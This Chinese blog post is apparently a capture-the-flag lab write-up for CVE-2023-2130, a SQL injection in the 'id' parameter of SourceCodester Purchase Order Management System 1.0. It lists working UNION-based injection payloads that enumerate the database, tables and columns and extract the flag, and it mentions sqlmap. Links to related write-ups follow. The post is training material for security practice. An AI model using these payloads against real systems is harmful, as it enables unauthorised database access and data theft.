[春秋云镜] CVE-2023-2130

最新推荐文章于 2025-03-10 21:06:35 发布
最新推荐文章于 2025-03-10 21:06:35 发布
阅读量1.5k 收藏 2
点赞数 10
分类专栏: 春秋云镜 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73649671/article/details/138089966
版权
文章描述了在SourceCodester采购订单管理系统1.0中发现的SQL注入漏洞(CVE-2023-2130),攻击者可通过操纵GET参数id进行远程攻击,成功获取敏感信息如数据库名、版本和表结构。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[春秋云镜] CVE-2023-2130

请添加图片描述

靶标介绍:

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

1、id=1 正常,id=1’ and 1=2 --+ 异常,判断id存在注入点

请添加图片描述请添加图片描述

2、sqlmap直接梭哈,得到flag{097e2ab7-e22f-4a46-9717-d1f9e0c3090e}
请添加图片描述

​​

3、手工注入,得到flag{fe8e4bdc-948e-4a23-94f1-04be078f954e}

1' order by 8--+  #8个字段
1' and 1=2 union select 1,2,3,4,5,6,7,8--+  #2,3,4,5,6有回显
1' and 1=2 union select 1,database(),3,4,5,6,7,8--+   #当前数据库为purchase_order_db
1' and 1=2 union select 1,version(),3,4,5,6,7,8--+    #版本为10.5.21-MariaDB-0+deb11u1
1' and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema='purchase_order_db'--+   
#表为item_list,users,supplier_list,po_list,system_info,fllllaaaag,order_items
1' and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name='fllllaaaag'--+
#列为id,flag
1' and 1=2 union select 1,flag,3,4,5,6,7,8 from fllllaaaag--+   #flag{fe8e4bdc-948e-4a23-94f1-04be078f954e}

​​
请添加图片描述

CVE-2023-33246 Apache RocketMQ 命令注入漏洞复现及分析
牛叫兽的测试学习和分享
06-02 1万+
CVE-2023-33246 漏洞复现及分析
春秋CVE-2023-43291 反序列化字符串逃逸+sql注入
2401_84968060的博客
05-13 236
重点包括三个包,发表文章注入payload,反序列化写入缓存,大佬文章写到了读取数据库表列的信息,我就直接到最后读取flag了。前面都没问题,后面读取flag的时候发现报错:上网搜了一下错误,发现是编码不一致导致的:然后修改payload,再次发包访问发现成功读取flag。
CVE-2023-2130复现
qq_45956062的博客
03-28 573
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
春秋CVE-2023-2130
最新发布
weixin_53974661的博客
03-10 316
1' and 1=2 union select 1,version(),3,4,5,6,7,8--+ #版本为10.5.21-MariaDB-0+deb11u1。1' and 1=2 union select 1,database(),3,4,5,6,7,8--+ #当前数据库为purchase_order_db。1' and 1=2 union select 1,2,3,4,5,6,7,8--+ #2,3,4,5,6有回显。1' order by 8--+ #8个字段。
春秋CVE-2023-2130
m0_64432806的博客
03-27 786
春秋CVE-2023-2130 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击
春秋境靶场之CVE-2023-2130
sjh0590的博客
09-18 494
春秋境靶场之CVE-2023-2130攻克过程
春秋 CVE-2023-2130
qq274575499的博客
04-01 1032
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
春秋CVE-2023-2130
weixin_49064458的博客
11-09 1060
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2023-21839EXP可执行文件
03-11
CVE-2023-21839EXP可执行文件 CVE-2023-21839为go语言编写,须先编译为可执行文件,这里我已经编译好了,有需要的自取
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1730
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋】Faculty Evaluation System未授权任意文件上传漏洞(CVE-2023-33440)
shelbytt的博客
06-12 902
登录邮箱不知道 一般是 admin@admin.com/admin 尝试无果,根据提示是未授权访问文件上传 ,应该不需要登录就能触发漏洞的,看了些漏洞介绍,直接burp suite抓包。因为该靶场没有Write up,索性自己搞一下,方便别人,快乐自己!随便点都没啥东西,索性拿工具扫描下敏感路径。访问shell 地址,拿到flag。只修改IP即可,发包即可上传成功。
春秋-CVE-2023-2130
dsasdasdd的博客
04-13 502
题目描述:在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。发现有回显,直接sqlmap爆破数据库。url输入id=1 看有没有回显。进入他提示的组件位置。
SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130
热门推荐
Flag少侠的博客
07-19 1万+
打开靶场直接进入是需要登录的访问漏洞页面如下传送 id 参数试试使用 SQLMap 爆库_____H__[Y/n] n[Y/n] n[y/N] n[Y/n] n[Y/n] n[y/N] n------[*] mysql爆表_____H__------[7 tables]| users |爆字段_____H__------爆数据_____H__------[1 entry]| flag |
春秋-CVE-2023-2130
xxxtentaction24的博客
04-28 270
查看fllllaaaag表代码: python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?使用代码:python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?测试是否存在sql问题我们在?
CVE-2023-32233 Linux kernel
sash1mi
05-16 2033
近日,研究人员发现了Linux内核的NetFilter框架中的新漏洞(CVE-2023-32233)。该漏洞可被本地用户用于将权限提升为root,并完全控制系统。问题的根源在于是如何处理批处理请求的,经过身份验证的本地攻击者可通过发送特制的请求破坏的内部状态,从而获得更高权限。该漏洞影响多个Linux内核版本,包括当前的稳定版本v6.3.1。漏洞原文。
CVE-2023-0215
qq_39933800的博客
06-14 3640
生产版本:5.5。
CVE-2023-29489 cPanel XSS漏洞分析研究
蚁景网安学院
05-04 2418
前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。一、漏洞原理漏洞简述cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail ...
CVE-2023-34541 LangChain 任意命令执行
蚁景网安学院
06-27 1425
漏洞简介LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中,由于load_prompt函数加载提示文件时未对加载内容进行安全过滤,攻击者可通过构造包含恶意命令的提示文件,诱导用户加载该文件,即可造成任意系统命令执行。漏洞复现在项目下编写 test.pyfromlangchain.promptsimportload_prompt if__name...
春秋CVE-2023-38836
06-15
很抱歉,由于安全性和隐私保护原则,我无法提供详细的CVE(Common Vulnerabilities and Exposures)报告或漏洞分析,尤其是对于特定的漏洞如春秋CVE-2023-38836。CVE是一个由美国国家网络安全中心维护的系统,用来标识信息安全漏洞。如果你需要了解某个CVE的具体信息,通常应该查阅官方的安全公告、厂商发布的声明,或者使用专业的安全资源和工具进行查询。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值